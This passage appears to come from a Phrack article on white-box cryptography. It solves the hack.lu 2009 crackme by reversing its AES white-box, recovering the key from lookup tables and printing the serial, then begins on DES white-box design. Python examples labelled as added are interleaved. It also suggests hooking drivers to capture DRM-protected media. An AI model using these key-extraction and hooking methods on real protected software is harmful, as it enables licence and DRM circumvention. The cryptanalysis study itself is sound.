          hand you may suspect that their product is broken by design.
          Alternatively it can be assumed that it is at least immune
          against current cryptanalysis techniques. Little can be said
          about other protections (whitecryption, Arxan, Syncrosoft) but we
          could speculate that it's not of the same caliber.

    So are WB protections hard to break in practice? Who knows? But
remember that protecting the key is one thing while protecting a content is
something different. So if you ever audit a white-box solution, before
trying to retrieve the key, see if you can intercept the plaintexts. There
are lots of possible attacks, potentially bypassing the WB protections
[R06].

Remark: Obviously in the case of DRM (if no hardware protection is
involved), you will always find a way to intercept unencrypted data. This
is because at some point the player will have to send audio/video streams
to the sound/video card drivers and you may want to hook some of their
functions to recover the media. This is however a practice to forget if the
media requires the synchronization of several streams (i.e. movies with
both audio and video).

    Now that said, let's begin with the first challenge :)


--[ 4 - Handling the first case: hack.lu's challenge


    I have to thank Jb for this binary as he was the one who suggested that
I solve it a few days ago*. Unfortunately my solution is biased as I knew
from the very beginning that it was an AES white-box. I may have taken a
different approach to solve it if I hadn't. This is however a good enough
example to introduce WB protections.

*: Phrack being usually late "a few days ago" probably means "a few weeks**
ago"
**: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago"
;>


----[ 4.1 - The discovery step


    Since the challenge is about breaking an AES white-box, it means that
we may need to perform several tasks:

    - finding out if the WB is an AES or an AES^-1 and the associated key
      length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover
      exactly *what* was white-boxed.

    - reversing every cryptographic function involved and discovering how
      they are related to the original AES functions. This is about
      understanding *how* the implementation was white-boxed.

    - finding a way to recover the original key.

    I won't describe the AES as it's not necessary to understand this part.
The necessary details will be provided a bit later. First of all, let's see
how the serial is retrieved. We'll start by a quick reverse engineering of
the sub_401320() function:

---------------------------------------------------------------------------
                 mov     eax, [esp+38h+hDlg]
                 push    21h             ; cchMax
                 lea     ecx, [esp+3Ch+String]
                 push    ecx             ; lpString
                 push    3ECh            ; nIDDlgItem
                 push    eax             ; hDlg
                 call    ds:GetDlgItemTextA
                 cmp     eax, 20h        ; is length == 32?
---------------------------------------------------------------------------

    Without too much surprise, GetDlgItemText() is called to retrieve an
alpha-numeric string. The comparison in the last line implies a length of
32 bytes in its ASCII representation (not including the null byte) hence a
16 bytes serial. Let's continue:

---------------------------------------------------------------------------
                 cmp     eax, 20h
                 jz      short good_serial  ; if len is ok then start the
                                            ; conversion

 bad_serial:
                 xor     eax, eax
                 [...]
                 retn ; return 0
 good_serial:
                 push    ebx
                 push    esi
                 xor     esi, esi  ; i=0
                 nop

 build_data_buffer:
                 movzx   edx, [esp+esi*2+40h+String]
                 push    edx
                 call    sub_4012F0 ; get most significant nibble
                 mov     ebx, eax
                 movzx   eax, [esp+esi*2+44h+var_27]
                 push    eax
                 shl     bl, 4
                 call    sub_4012F0 ; get least significant nibble
                 or      bl, al     ; bl is now a converted byte
                 mov     byte ptr [esp+esi+48h+input_converted], bl
                                    ; input_converted[i] = bl
                 inc     esi        ; i++
                 add     esp, 8
                 cmp     esi, 10h
                 jl      short build_data_buffer

                 lea     ecx, [esp+40h+input_converted]
                 push    ecx
                 mov     edx, ecx
                 push    edx
                 call    sub_401250 ; white-box wrapper
                 add     esp, 8
                 pop     esi
                 mov     eax, 10h
                 xor     ecx, ecx
                 pop     ebx

                 ; Compare the resulting buffer byte after byte

 compare_buffers:
                 mov     edx, [esp+ecx+38h+input_converted]
                 cmp     edx, dword ptr ds:aHack_lu2009Ctf[ecx]
                                     ; "hack.lu-2009-ctf"
                 jnz     short bad_serial
                 sub     eax, 4
                 add     ecx, 4
                 cmp     eax, 4
                 jnb     short compare_buffers
                 [...]
                 retn
---------------------------------------------------------------------------

    The alphanumeric string is then converted byte after byte using the
sub_4012F0() function into the corresponding plaintext (or ciphertext) block
for cryptographic manipulations. The function sub_401250() is then called
taking it as a parameter. When the function returns, the buffer is then
compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal,
the serial is valid (the function returns 1).

    Let's see sub_401250() in more detail:

---------------------------------------------------------------------------
 sub_401250      proc near        ; WrapperWhiteBox
                 [...]
                 mov     eax, [esp+14h+arg_0]
                 push    esi
                 mov     esi, [esp+18h+arg_4]
                 xor     ecx, ecx
                 add     eax, 2
                 lea     esp, [esp+0]

 permutation1:
                 ; First step is a transposition (special permutation)

                 movzx   edx, byte ptr [eax-2]
                 mov     [esp+ecx+18h+var_14], dl
                 movzx   edx, byte ptr [eax-1]
                 mov     [esp+ecx+18h+var_10], dl
                 movzx   edx, byte ptr [eax]
                 mov     [esp+ecx+18h+var_C], dl
                 movzx   edx, byte ptr [eax+1]
                 mov     [esp+ecx+18h+var_8], dl
                 inc     ecx
                 add     eax, 4
                 cmp     ecx, 4
                 jl      short permutation1

                 ; Second step is calling the white-box

                 lea     eax, [esp+18h+var_14]
                 push    eax
                 call    sub_401050  ; call WhiteBox
                 [...]

 permutation2:
                 ; Third step is also a transposition
                 ; Bytes' position are restored

                 movzx   edx, [esp+ecx+14h+var_14]
                 mov     [eax-2], dl
                 movzx   edx, [esp+ecx+14h+var_10]
                 mov     [eax-1], dl
                 movzx   edx, [esp+ecx+14h+var_C]
                 mov     [eax], dl
                 movzx   edx, [esp+ecx+14h+var_8]
                 mov     [eax+1], dl
                 inc     ecx
                 add     eax, 4
                 cmp     ecx, 4
                 jl      short permutation2
                 [...]
                 retn
---------------------------------------------------------------------------

    At first sight, sub_401250() is composed of three elements:

        - A first bunch of instructions operating on the buffer which is
          no more than a (4x4) matrix transposition operating on bytes.

          For example:

                 A B C D           A E I M
                 E F G H  becomes  B F J N
                 I J K L           C G K O
                 M N O P           D H L P

          This is a common step to prepare the plaintext/ciphertext block
          into the so-called "state" as the AES operates on a 4x4 matrix.

        - This function is then calling sub_401050() which is composed of
          elementary operations such as XOR, rotations and substitutions.

        - A second transposition. One important thing to know about the
          transposition is that the function is its own inverse. The former
          bytes' positions are thus restored.

   sub_401050() is the WB. Whether it's an AES or an AES^-1 function and
its keylength has yet to be determined. The serial acts as a plaintext or
a ciphertext which is (de,en)crypted using a key that we want to retrieve.
Since the output buffer is compared with an English sentence, it seems fair
to assume that the function is an AES^-1.


                Reverse engineering of sub_401050()
                -----------------------------------


    Detailing the whole reverse engineering steps is both boring and
meaningless as it doesn't require special skills. It's indeed pretty
straightforward. The resulting pseudo C code can be written as such:

----------------------------- First version -------------------------------
void sub_401050(char *arg0)
{
    int round,i;

    // 9 first rounds
    for(round=0; round<9; round++)
    {
      // step-1(round)
      for(i=0; i<16; i++)
        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];

      // step-2
      sub_401020(arg0);

      // step-3
      for(i=0; i<4; i++)
      {
        char cl,dl, bl, var_1A;

        cl  = byte_414000[ arg0[0+i]*4 ];
        cl ^= byte_414400[ arg0[4+i]*4 ];
        cl ^= byte_414800[ arg0[8+i]*4 ];
        cl ^= byte_414C00[ arg0[12+i]*4 ];

        dl  = byte_414000[ 1 + arg0[0+i]*4 ];
        dl ^= byte_414400[ 1 + arg0[4+i]*4 ];
        dl ^= byte_414800[ 1 + arg0[8+i]*4 ];
        dl ^= byte_414C00[ 1 + arg0[12+i]*4 ];

        bl  = byte_414000[ 2 + arg0[0+i]*4 ];
        bl ^= byte_414400[ 2 + arg0[4+i]*4 ];
        bl ^= byte_414800[ 2 + arg0[8+i]*4 ];
        bl ^= byte_414C00[ 2 + arg0[12+i]*4 ];

        var_1A = bl;

        bl  = byte_414000[ 3 + arg0[0+i]*4 ];
        bl ^= byte_414400[ 3 + arg0[4+i]*4 ];
        bl ^= byte_414800[ 3 + arg0[8+i]*4 ];
        bl ^= byte_414C00[ 3 + arg0[12+i]*4 ];

        arg0[0+i] = cl;
        arg0[4+i] = dl;
        arg0[8+i] = var_1A;
        arg0[12+i] = bl;
      }
    }

    // step-4
    for(i=0; i<16; i++)
      arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ];

    // step-5
    sub_401020(arg0);
    return;
}
----------------------------- First version -------------------------------

    It seems that we have 10 (9 + 1 special) rounds which probably means
an AES-128 or an AES-128^-1 (hence a 16 bytes keylength as both are
related).

Remark: Something very important is that we will try to solve this problem
using several assumptions or hypotheses. For example there is no evident
proof that the number of rounds is 10. It _seems_ to be 10 but until the
functions (and especially the tables) involved are analyzed, we should
always keep in mind that we may be wrong with the guess and that some evil
trick could have been used to fool us.

    Now we have the big picture, let's refine it a bit. For that, we will
analyze:

    - The tables at addresses 0x408138 (step-1) and 0x411138 (step-4)
    - The round independent function sub_401020 (step-2, step-5)
    - step-3 and the 16 arrays byte_414x0y with:
          - x in {0,4,8,C}
          - y in {0,1,2,3}

    The tables are quite easy to analyze. A short look at them shows that
there is one substitution table per character per round. Each substitution
seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 =
0x411138 (which is the address of the last round's table).

    The function sub_401020() is a mere wrapper of function sub_401000():

---------------------------------------------------------------------------
void sub_401020(arg0)
{
    int i;

    for(i=0; i<4; i++)
        sub_401000(arg0, 4*i, i);
}

// arg4 parameter is useless but who cares?
void sub_401000(arg0, arg4, arg8)
{
    if(arg8 != 0)
    {
        (int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF;
        (int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8)));
    }
    return;
}
---------------------------------------------------------------------------

    This is clearly the ShiftRows() elementary function of the AES.
For example:

        59 49 90 3F           59 49 90 3F   [ <<< 0 ]
        30 A7 02 8C  becomes  A7 02 8C 30   [ <<< 1 ]
        0F A5 07 22           07 22 0F A5   [ <<< 2 ]
        F9 A8 07 DD           DD F9 A8 07   [ <<< 3 ]

        here '<<<' is a cyclic shift

    ShiftRows() is used in the encryption function while the decryption
function uses its inverse. Unless there is a trap to fool us, this is a
serious hint that our former assumption was wrong and that the WB is an
AES, not an AES^-1.

    Now regarding step-3 let's begin by looking at the tables. They all
hold bijections but clearly neither random nor distinct ones. Let's look
for example at the byte_414400 table:

    byte_414400 : 0 3 6 5 C F A 9 ...

    (The elements of this table are located at 0x414400, 0x414404,
     0x41440C, etc. This is because of the *4 that you can see in the C
     code. This rule also applies to the 15 other tables.)

    If you ever studied/implemented the AES then you must know that its
structure is algebraic. The MixColumns in particular is an operation
multiplying each column of the state by a particular 4x4 matrix. The
coefficients of such mathematical objects are _not_ integers but rather
elements of GF(2^8) whose representation is fixed by a particular binary
polynomial.

    Now if you don't have a clue about what I'm saying let's just say that
the multiplication of said AES coefficients is not a simple integer
multiplication. Since the calculus in itself would be highly inefficient
most implementations use special tables holding the precomputed results.
AES requires knowing how to multiply by 01, 02, and 03 in GF(2^8). In
particular byte_414400 is a table used to compute b = 3*a in such a field
(a is the index of the table and b is the value stored at this index).

    Now let's look at the tables. In each case it was easy to see that they
were holding a precomputed multiplication by a given coefficient:

            byte_414000 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414400 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414800 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414C00 : 0 1 2 3 4 5 6 7 ...  // Coef = 1

            byte_414001 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414401 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414801 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414C01 : 0 1 2 3 4 5 6 7 ...  // Coef = 1

            byte_414002 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414402 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414802 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414C02 : 0 3 6 5 C F A 9 ...  // Coef = 3

            byte_414003 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414403 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414803 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414C03 : 0 2 4 6 8 A C E ...  // Coef = 2

    As a result, step-3 can be written as:

          [ arg0(0,i)     [ 02 03 01 01      [ arg0(0,i)
            arg0(4,i)   =   01 02 03 01   x    arg0(4,i)
            arg0(8,i)       01 01 02 03        arg0(8,i)
            arg0(c,i) ]     03 01 01 02 ]      arg0(c,i) ]

    And this is exactly the MixColumns of the AES! Everything taken into
account gives this new version of sub_401250():

---------------------------- Second version -------------------------------
void sub_401050(char *arg0)
{
    int round,i;

    // 9 first rounds
    for(round=0; round<9; round++)
    {
      // step-1(round)
      for(i=0; i<16; i++)
        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];

      // step-2
      ShiftRows(arg0);

      // step-3
      MixColumns(arg0);
    }

    // Last round

    // step-4
    for(i=0; i<16; i++)
      arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ];

    // step-5
    ShiftRows(arg0);
    return;
}
---------------------------- Second version -------------------------------

   This confirms the assumption that the WB is an AES as AES^-1 uses the
inverse function of MixColumns which makes use of a different set of
coefficients (matrix inversion). As you can see the key material is not
explicit in the code, somehow hidden in the tables used in step-1. Kinda
normal for a WB ;)
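
    The identification of the step-3 tables done by eye above, as an added
example (not code from the challenge or from the article): it names the
GF(2^8) coefficient behind a dumped table prefix and tells the MixColumns
matrix from its inverse. The prefixes are the ones listed above; every
function name is hypothetical.

```python
# Added example, not code from the challenge or from the article.
# Fingerprints "multiply by a constant in GF(2^8)" tables such as the
# byte_414x0y ones and names the matrix they implement.

def xtime(a):
    """Multiply by 02 in GF(2^8), reduced by the AES polynomial 0x11B."""
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a

def gf_mul(a, c):
    """Multiply a by the constant c in GF(2^8) (shift-and-add)."""
    r = 0
    while c:
        if c & 1:
            r ^= a
        a = xtime(a)
        c >>= 1
    return r

MIX_COLUMNS = [[2, 3, 1, 1], [1, 2, 3, 1], [1, 1, 2, 3], [3, 1, 1, 2]]
INV_MIX_COLUMNS = [[14, 11, 13, 9], [9, 14, 11, 13],
                   [13, 9, 14, 11], [11, 13, 9, 14]]

def identify_coefficient(prefix):
    """Return c if prefix[a] == c*a for every dumped entry, else None.

    Entry 1 of such a table is c itself (c*1 = c), which gives the
    candidate; the other entries confirm or reject it. A "random"
    bijection like the step-1 tables is rejected.
    """
    if len(prefix) < 2 or prefix[0] != 0:
        return None
    c = prefix[1]
    if all(gf_mul(a, c) == v for a, v in enumerate(prefix)):
        return c
    return None

def classify(tables):
    """tables[y][x]: prefix of the table feeding output byte y from
    input byte x of a column. Returns the name of the matrix found."""
    matrix = [[identify_coefficient(t) for t in row] for row in tables]
    if matrix == MIX_COLUMNS:
        return "MixColumns"
    if matrix == INV_MIX_COLUMNS:
        return "InvMixColumns"
    return "unknown"

# Prefixes as listed in the article (first 8 entries of each table).
C1 = [0x0, 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7]
C2 = [0x0, 0x2, 0x4, 0x6, 0x8, 0xA, 0xC, 0xE]
C3 = [0x0, 0x3, 0x6, 0x5, 0xC, 0xF, 0xA, 0x9]

# Row y holds byte_41400y, byte_41440y, byte_41480y, byte_414C0y.
DUMPED = [[C2, C3, C1, C1],
          [C1, C2, C3, C1],
          [C1, C1, C2, C3],
          [C3, C1, C1, C2]]

if __name__ == "__main__":
    print(classify(DUMPED))
```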


----[ 4.2 - The key recovery


   The general algorithm (not including the key schedule which generates K)
of AES-128 encryption is the following:

---------------------------------------------------------------------------
ROUNDS=10
def AES_128_Encrypt(block):         # 'in' is a reserved word in python

    out = block
    AddRoundKey(out, K[0])

    for r in xrange(1, ROUNDS):     # rounds 1..9 use K[1]..K[9]
        SubBytes(out)
        ShiftRows(out)
        MixColumns(out)
        AddRoundKey(out,K[r])

    SubBytes(out)
    ShiftRows(out)
    AddRoundKey(out, K[10])
    return out
---------------------------------------------------------------------------

    Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o'
is the symbol for the composition of functions, this allows us to write:

        SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9]

    Exploiting the first round, this immediately gives a system of
equations (with S being located at 0x408138):

        SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ]  for i in [0..15]

    The equations hold for any arg0[i] and in particular for arg0[i] = 0.
The resulting simplified system is thus:

        SubBytes(K[0][i]) = S[i]         for i in [0..15]
        K[0][i] = SubBytes()^-1 o S[i]   for i in [0..15]

    Let's try it on the rub^Wpython console:

---------------------------------------------------------------------------
>>> sbox2 = inv_bij(sbox);  # We compute SubBytes^-1
>>> S = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF,
         0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138
>>> S2 = [0]*16
>>> for i in xrange(16):
...     S2[i] = sbox2[S[i]];
...
>>> S2;
[20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38]
---------------------------------------------------------------------------

But remember that a transposition is necessary to retrieve the subkey!

---------------------------------------------------------------------------
>>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :)
>>> S4 = []
>>> for i in xrange(16):
...     S4.insert(i,S2[P[i]])
---------------------------------------------------------------------------

    Now S4 holds the subkey K[0]. An interesting property of the AES key
schedule is that the subkey K[0] is equal to the key before derivation.
This is why our priority was to exploit the first round.

---------------------------------------------------------------------------
>>> s = 'hack.lu-2009-ctf'
>>> key = ''.join(map(lambda x: chr(x), S4))
>>> key
'\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&'
>>> keyObj=AES.new(key)
>>> encPwd=keyObj.decrypt(s)
>>> encPwd.encode('hex').upper()
'192EF9E61164BD289F773E6C9101B89C'
---------------------------------------------------------------------------

    And the solution is the same as baboon's one [R03]. Of course there
were many other ways to proceed but it's useless to even consider them due
to the very weak nature of this 'WB'.


----[ 4.3 - Random thoughts


    Jb designed this challenge so that it could be solved in the 2-days
context of the hack.lu CTF. It's very likely that any reverser familiar
with the AES would be able to deal with it rather easily and so did baboon
at that time when he came up with a smart and quick solution [R03]. If Jb
had used the implementation described in [R07] then it would have been a
whole other game though still breakable [R05].

    That being said, this implementation (which is based on what is called
partial evaluation) may only be a toy cipher but it's perfect to introduce
more advanced concepts. Indeed several security measures (amongst others)
were voluntarily missing:

    - ShiftRows() and MixColumns() were not modified. A strong
      implementation would have transformed them. Additionally SubBytes()
      could have been transformed in a less gentle manner to mitigate
      trivial attacks.

    - There is a direct correspondence between an obfuscated function and
      its unprotected "normal" counterpart. Inputs and outputs of such
      functions are synchronized or you could say that intermediate states
      can be observed. "Internal encoding" removes this property.

    - The first and last rounds should have a special protection. This is
      because the input (respectively the output) of the first
      (respectively the last) round can be synchronized with the normal
      implementation. "External encoding" is used to prevent this but as a
      side effect alters the compatibility with the original encryption.

    - etc.
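
    The first-round recovery of 4.2 and the missing "internal encoding"
noted in the list above, as an added example (not code from the challenge
or from the article): it checks the SubBytes o AddRoundKey hypothesis over
all 256 inputs instead of x = 0 only, and shows that the check fails once
an output bijection is composed into the table. The table generator, the
test key, the seed and all function names are assumptions.

```python
# Added example, not code from the challenge or from the article.
import random

def xtime(a):
    """Multiply by 02 in GF(2^8), reduced by the AES polynomial 0x11B."""
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a

def build_sbox():
    """AES S-box from its definition: GF(2^8) inverse, then affine map."""
    exp, log, x = [0] * 255, [0] * 256, 1
    for i in range(255):
        exp[i], log[x] = x, i
        x ^= xtime(x)                  # x *= 03, a generator of the field
    sbox = []
    for a in range(256):
        inv = exp[(255 - log[a]) % 255] if a else 0
        s = inv
        for k in range(1, 5):          # s = inv ^ rotl(inv, 1..4)
            s ^= ((inv << k) | (inv >> (8 - k))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox

SBOX = build_sbox()
INV_SBOX = [0] * 256
for _x, _y in enumerate(SBOX):
    INV_SBOX[_y] = _x

# Same list as P in the article: the WB stores the state row by row
# while the AES key is laid out column by column.
TRANSPOSE = [4 * (i % 4) + i // 4 for i in range(16)]

def random_encoding(seed):
    """16 random byte bijections, one per state byte (seeded, constructed)."""
    rng = random.Random(seed)
    return [rng.sample(range(256), 256) for _ in range(16)]

def step1_table(key, encoding=None):
    """Toy generator (assumption): round-0 table in the layout
    S[i + x*16] = SubBytes(x ^ k), optionally followed by a bijection
    that the next table of a real design would undo."""
    table = [0] * (16 * 256)
    for i in range(16):
        k = key[TRANSPOSE[i]]
        for x in range(256):
            v = SBOX[x ^ k]
            table[i + x * 16] = encoding[i][v] if encoding else v
    return table

def recover_k0(first_row):
    """K[0] from the 16 entries at x = 0 (the S list of the article)."""
    s2 = [INV_SBOX[v] for v in first_row]
    return bytes(s2[TRANSPOSE[i]] for i in range(16))

def hypothesis_holds(table):
    """True if SubBytes^-1(S[i + x*16]) ^ x is the same byte for every x,
    i.e. the table really is SubBytes o AddRoundKey and nothing else."""
    for i in range(16):
        k = INV_SBOX[table[i]]
        if any(INV_SBOX[table[i + x * 16]] ^ x != k for x in range(256)):
            return False
    return True

# The 16 bytes dumped @ 0x0408138 in the article.
DUMPED_ROW = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39,
              0xAE, 0x69, 0xFF, 0xCB, 0xAB, 0xCD, 0xCF, 0xF7]
TEST_KEY = b"constructed key!"         # constructed, 16 bytes

if __name__ == "__main__":
    print(recover_k0(DUMPED_ROW).hex())
    plain = step1_table(TEST_KEY)
    print(hypothesis_holds(plain), recover_k0(plain[:16]) == TEST_KEY)
    encoded = step1_table(TEST_KEY, random_encoding(1))
    print(hypothesis_holds(encoded), recover_k0(encoded[:16]) == TEST_KEY)
```

An encoded table only defeats this particular check; as said above, the
design of [R07] is still breakable [R05].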

Remark: If you ever come across a WB implementation, let me give you 2 nice
tricks to see in the blink of an eye if it's potentially weak or not:

    - Look at the size of the implementation. Remember that the size of an
      obfuscated primitive is deeply related to the number and size of the
      lookup tables, the weight of the opcodes being generally negligible.
      In this case, the binary was 85 kB whereas the state of the art
      requires at least 770 kB. It was thus obvious that several
      obfuscation layers were missing.

    - The fully obfuscated version of the algorithms described in [R07]
      only uses XOR and substitutions (lookup tables) as MixColumns and
      ShiftRows are both transformed to make it possible. One may however
      point out that the statement holds with T-tables based
      implementations. It's true but such implementations use well known
      tables so it's easy to fingerprint them.

    Remember that real-life white-boxes (i.e. used in DRM, embedded
devices, etc.) are likely to be close to the state of the art (assuming
they are designed by crypto professionals and not by the average engineer
;)). Conversely, they may also face practical problems (size, speed)
which have an impact on their security. This is especially true with
embedded devices.


--[ 5 - White-boxing the DES


    If you're still reading (hi there!) then it probably means that you
already have at least a basic knowledge of cryptography. So you know that
DES should not be used because of its short keylength (56 bits), right?
Then why the hell should we be focused on it? Well because:

    - There are only 2 public white-box design families: AES and DES
    - If you can white-box DES, then you can probably white-box 3DES as
      well (which is strong)
    - I couldn't find a non commercial sophisticated enough AES WB to play
      with and I don't want to be sued by M$, Adobe, etc. :D

Remark: While AES WB cryptanalyses are essentially algebraic, DES related
ones are statistical as you will soon find out.


----[ 5.1 - The DES algorithm


    DES is a so called Feistel cipher [R01] with a block size of 64 bits
and 16 rounds (r). First a permutation (IP) is applied to the input then
in each round a round-function is applied which splits its input in two 32
bits buffers L (Left) and R (Right) and applies the following equations
system:

    L(r+1) = R(r)
    R(r+1) = L(r) [+] f(R(r),K(r))

    With:
        0 <= r < 16
        [+] being the XOR operation

    The round function is described by the following scheme:

--------------------------- DES round function ----------------------------
 **********    **********
 *  L(r)  *    *  R(r)  *
 **********    **********
      |            |
    .------------- |
    | |            v                           .---------------------.
    | |     .-------------.                   / Linear transformation \
    | |      \   E-Box   /                   (       32b -> 48b        )
    | |       '---------'                     \                       /
    | |            |                           '---------------------'
    | |            v                                .------------.
    | |          .....        **********           / XOR operand  \
    | |          . + .<------ *  K(r)  *          (  2x48b -> 48b  )
    | |          .....        **********           \              /
    | |            /\                               '------------'
    | |           /  \
    | |          v    v                      .-------------------------.
    | |   .------.    .------.              / Non linear transformation \
    | |    \ S1 / ...  \ S8 /              (          using SBox         )
    | |     '--'        '--'                \        8x6b -> 8x4b       /
    | |         \      /                     '-------------------------'
    | |          \    /
    | |           v  v                          .---------------------.
    | |        .--------.                      / Linear transformation \
    | |        |  P-Box |                     (       32b -> 32b        )
    | |        '--------'                      \                       /
    | |            |                            '---------------------'
    | |          ..v..                              .------------.
    | '--------->. + .                             / XOR operand  \
    |            .....                            (  2x32b -> 32b  )
    |              |                               \              /
    v              v                                '------------'
 **********    **********
 * L(r+1) *    * R(r+1) *
 **********    **********
---------------------------------------------------------------------------

    When the 16 rounds are completed, the IP^-1() function is applied and
the result is called the ciphertext.

    While SBox and XOR are self explanatory, let me give you a few more
details about the linear transformations (E-Box and P-Box).


                                 The E-Box
                                 ---------


    The E-Box is used to extend a 32 bits state into a 48b one so that each
bit can be combined with a round-key bit using a XOR. To transform 32 bits
into 48 bits, 16 out of the 32 bits are duplicated. This is performed using
the following table:

                         32,  1,  2,  3,  4,  5,
                          4,  5,  6,  7,  8,  9,
                          8,  9, 10, 11, 12, 13,
                         12, 13, 14, 15, 16, 17,
                         16, 17, 18, 19, 20, 21,
                         20, 21, 22, 23, 24, 25,
                         24, 25, 26, 27, 28, 29,
                         28, 29, 30, 31, 32,  1

    For example, the first bit of output will be the last bit of input (32)
and the second bit of output will be the first bit of input (1). In this
particular case the bit positions are written from 1 to 32. As you may have
noticed, the 16 bits from columns 3 and 4 are not duplicated. They are
called the middle bits, we will see later why they are important.
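
    The E-Box and its middle bits, as an added example (not code from the
article): it derives the 16 non-duplicated positions from the table itself
and checks that E(R) plus those 16 bits holds every bit of R exactly
twice, which is the property the 96 bits state of 5.2 relies on. Numbering
bit 1 as the most significant bit and the order of the selected bits are
assumptions, as are the function names.

```python
# Added example, not code from the article.
from collections import Counter

# E-Box table as given in the article (positions numbered 1..32).
E_BOX = [32,  1,  2,  3,  4,  5,
          4,  5,  6,  7,  8,  9,
          8,  9, 10, 11, 12, 13,
         12, 13, 14, 15, 16, 17,
         16, 17, 18, 19, 20, 21,
         20, 21, 22, 23, 24, 25,
         24, 25, 26, 27, 28, 29,
         28, 29, 30, 31, 32,  1]

# Positions used only once by the table: columns 3 and 4, the middle bits.
MIDDLE = sorted(p for p, n in Counter(E_BOX).items() if n == 1)

def to_bits(value, width):
    """Bit list; position 1 (index 0) is the most significant bit."""
    return [(value >> (width - 1 - i)) & 1 for i in range(width)]

def from_bits(bits):
    value = 0
    for b in bits:
        value = (value << 1) | b
    return value

def expand(r):
    """E-Box: 32 bits of R -> 48 bits."""
    bits = to_bits(r, 32)
    return from_bits([bits[p - 1] for p in E_BOX])

def select(r):
    """The 16 middle bits of R, in ascending position (assumed order)."""
    bits = to_bits(r, 32)
    return from_bits([bits[p - 1] for p in MIDDLE])

def merge(x, middle):
    """Rebuild R: duplicated bits come from the 48 bits word, the
    middle bits from the 16 bits word."""
    out = [0] * 32
    for bit, p in zip(to_bits(x, 48), E_BOX):
        if p not in MIDDLE:
            out[p - 1] = bit
    for bit, p in zip(to_bits(middle, 16), MIDDLE):
        out[p - 1] = bit
    return from_bits(out)

def copies_per_bit():
    """How many times each bit of R appears in E(R) || middle bits."""
    return Counter(E_BOX + MIDDLE)

if __name__ == "__main__":
    r = 0x12345678                     # constructed sample value
    print(MIDDLE)
    print(hex(expand(r)), hex(select(r)), hex(merge(expand(r), select(r))))
```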


                                 The P-Box
                                 ---------


    The P-Box is a bit permutation which means that every bit of input will
have a new position in the output. Such a transformation is linear and can
be represented by a bit matrix. When combined with a XOR operation with a
constant, this is what we call an affine transformation (AT).


----[ 5.2 - An overview of DES WB primitives


    The first WB DES implementation was presented in [R09]. Explaining how
and why DES white-boxes were designed is not the simplest of tasks,
especially with an ASCII / 75 columns constraint ;> I'll try to focus on
the main mechanisms so that you can get a global picture with the next
section. At some point you may however feel lost. In that case, please read
the excellent [R15] <3


                           The protection of I/O
                          ---------------------


    The reverser is able to intercept every step of the algorithm as well
as to examine all the memory. This gives him a huge advantage as he can
easily trace all inputs and outputs of elementary functions of the WB.

    In the case of DES, this is even easier thanks to the very nature of
Feistel network. For example an attacker would easily locate the output of
the P-Box in round (r) because it is combined with part of the input: L(r).
To mitigate this, several transformations are performed:

    a) All elementary operations of the white-box are performed on 96 bits
       states. Let's try to understand why.

       Initially a native DES round begins with the 64 bits state
       L(r) || R(r). R(r) is then extended using the E-box to
       generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r)
       are still part of the internal state because they are still
       contributing to the round's operations:


                 **************    **************
                 *    L(r)    *    *     R(r)   *
                 **************    **************
                       |     .------------|  32b
                       |     |            v
                       |     |  .-------------------.
                   32b | 32b |  |       E-box       |
                       |     |  '-------------------'
                       |     |            |  48b
                       v     v            v
                      Mem1  Mem2         Mem3


       At this point the internal state is composed of 32 x 2 + 48 = 112
       bits which is the maximum required size before being shrunken to a
       64 bits state at the end of the round: L(r+1) || R(r+1). To avoid
       any information leak, a unique -constant size- state is used to hide
       the position of the bits.

       If you remember paragraph 5.1, the E-Box is duplicating 16 out of
       the 32 bits of R(r). As a result, constructing 'Mem2' can be done
       extracting 16 bits out of R(r) and the 16 remaining ones out of
       'Mem3'. With this property, the internal state is composed of 96
       bits. Here is a diagram ripped from [R17] to understand how the
       primitive is modified to handle this 96 bits state:


                    32b               48b              16b
               ************** ********************* ********
    state 1:   *     L(r)   * *       X(r)        * * r(r) *
               ************** ********************* ********
                     |                |      |         |
                     |                v      |         |
                     | *********    .....    |         v
                     | * sK(r) *--> . + .    |    .-------.
                     | *********    .....    '-->(  Merge  )
                     |                |           '-------'
                     |                v               |
                     |         .-------------.        |
                     |          \     S     /         |
                     |           '---------'          |
                     |                |               |
                32b  v                v 32b     32b   v
               ************** *************** ***************
